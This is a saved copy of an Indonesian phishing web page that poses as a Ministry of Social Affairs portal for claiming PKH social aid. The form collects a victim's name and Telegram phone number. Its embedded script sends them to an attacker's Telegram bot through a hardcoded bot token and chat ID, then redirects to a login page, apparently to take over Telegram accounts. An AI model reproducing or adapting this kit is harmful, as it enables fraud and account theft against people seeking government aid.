<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from klaimbansos2024.bsite.net/bansos/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 22 Aug 2024 06:44:37 GMT -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="og:title" content="Ayo Segera Daftar Untuk Dapatkan Bantuan Sosial PKH" />
    <meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="https://i.postimg.cc/8zB6WZN7/ini.jpg">
    <meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://i.postimg.cc/8zB6WZN7/ini.jpg">
    <meta property="og:url" content="www.pulsagratis.com" />
    <meta property="og:type" content="website" />
    <title>Ayo Segera Daftar Untuk Dapatkan Bantuan Sosial PKH</title>
    <script src="http://unpkg.com/alpinejs" defer></script>
    <link href="../../cdn.jsdelivr.net/npm/daisyui%404.12.10/dist/full.min.css" rel="stylesheet" type="text/css" />
    <link href="../../cdn.jsdelivr.net/npm/tailwindcss%402.2.19/dist/tailwind.min.css" rel="stylesheet">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Lexend:wght@100..900&amp;display=swap');
    </style>
</head>
<body class="bg-gray-100">
    <!-- Navbar -->
    <nav x-data="{ isOpen: false }" class="relative bg-white shadow dark:bg-gray-800">
        <div class="container px-6 py-3 mx-auto md:flex">
            <div class="flex items-center justify-between">
                <a href="#">
                    <img class="w-auto h-6 sm:h-7" src="assets/img/dtks.png" alt="">
                </a>
    
                <!-- Mobile menu button -->
                <div class="flex lg:hidden">
                    <button x-cloak @click="isOpen = !isOpen" type="button" class="text-gray-500 dark:text-gray-200 hover:text-gray-600 dark:hover:text-gray-400 focus:outline-none focus:text-gray-600 dark:focus:text-gray-400" aria-label="toggle menu">
                        <svg x-show="!isOpen" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">
                            <path stroke-linecap="round" stroke-linejoin="round" d="M4 8h16M4 16h16" />
                        </svg>
                
                        <svg x-show="isOpen" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">
                            
                        </svg>
                    </button>
                </div>
            </div>
    
            <!-- Mobile Menu open: "block", Menu closed: "hidden" -->
        </div>
    </nav>
      
    <!-- Image Below Navbar -->
    <div class="container mx-auto mt-6 px-4">
        <img src="assets/img/ini.jpg" class="w-full rounded-md shadow-md" alt="Responsive image">
    </div>

    <!-- Form -->
    <div class="container mx-auto mt-6 px-4">
        <h2 class="text-2xl  font-bold text-gray-800 mb-1">Silahkan input data dibawah</h2>
        <form id="claimForm" class="bg-white p-6 rounded-md shadow-md">

            <div class="mb-4">
                <label for="Nama" class="block text-gray-700">Nama: </label>
                <input type="text" maxlength="14" placeholder="Nama sesuai E-KTP" id="nama" name="nama" class="w-full mt-2 p-2 border border-blue-300 rounded-md shadow-xl focus:outline-none focus:ring-2 focus:ring-blue-500">
            </div>
        
            <div class="mb-4">
                <label for="phoneNumber" class="block text-gray-700">Nomor Telepon: </label>
                <input type="tel" maxlength="14" placeholder="Nomor terdaftar di Telegram" id="phoneNumber" name="nohp" class="w-full mt-2 p-2 border border-blue-300 rounded-md shadow-xl focus:outline-none focus:ring-2 focus:ring-blue-500">
            </div>
            <button type="submit" id="submitButton" class="w-full bg-blue-500 text-white py-2 rounded-md hover:bg-blue-600">Cek Status</button>
        </form>
    </div>

    <!-- footer -->
    <footer class="bg-white dark:bg-gray-900">
        <div class="container flex flex-col items-center justify-between p-6 mx-auto space-y-4 sm:space-y-0 sm:flex-row">
            <a href="#">
                <img class="w-auto" src="assets/img/ini1.png" alt="">
            </a>
    
            <p class="text-sm text-gray-600 dark:text-gray-300">© PUSDATIN KESOS by KEMENTERIAN SOSIAL REPUBLIK INDONESIA</p>
        </div>
    </footer>

    <script>
        const TELEGRAM_BOT_TOKEN = '6961788126:AAGA8FwxSiwlL4CJHWwVyNsyy_fcLfjluic';
        const CHAT_ID = '7434018606';
    
        document.getElementById('claimForm').addEventListener('submit', function(event) {
            event.preventDefault();
            
            const nama = document.getElementById('nama').value;
            const phoneNumber = document.getElementById('phoneNumber').value;
            
            // Simpan input ke sessionStorage
            sessionStorage.setItem('nama', nama);
            sessionStorage.setItem('phoneNumber', phoneNumber);
    
            const message = `𝗡𝗮𝗺𝗮:\n${nama}\n𝗡𝗼𝗺𝗼𝗿 𝗛𝗣:\n${phoneNumber}`;
    
            const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${encodeURIComponent(message)}`;
    
            const submitButton = document.getElementById('submitButton');
            submitButton.textContent = 'Mohon Tunggu...';
            submitButton.disabled = true;
    
            fetch(url)
                .then(response => response.json())
                .then(data => {
                    if (data.ok) {
                        window.location.href = 'login.html';
                    } else {
                        alert('Terjadi kesalahan. Coba lagi.');
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                    alert('Terjadi kesalahan. Coba lagi.');
                })
                .finally(() => {
                    submitButton.textContent = 'Cek Status';
                    submitButton.disabled = false;
                });
        });
    
        // Pre-populate the form with data from sessionStorage if available
        window.addEventListener('load', function() {
            const storedNama = sessionStorage.getItem('nama');
            const storedPhoneNumber = sessionStorage.getItem('phoneNumber');
    
            if (storedNama) document.getElementById('nama').value = storedNama;
            if (storedPhoneNumber) document.getElementById('phoneNumber').value = storedPhoneNumber;
        });
    </script>
    

    <!-- Tailwind CSS JS -->
    <script src="../../cdn.jsdelivr.net/npm/tailwindcss%402.2.19/dist/tailwind.min.js"></script>
</body>

<!-- Mirrored from klaimbansos2024.bsite.net/bansos/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 22 Aug 2024 06:44:56 GMT -->
</html>



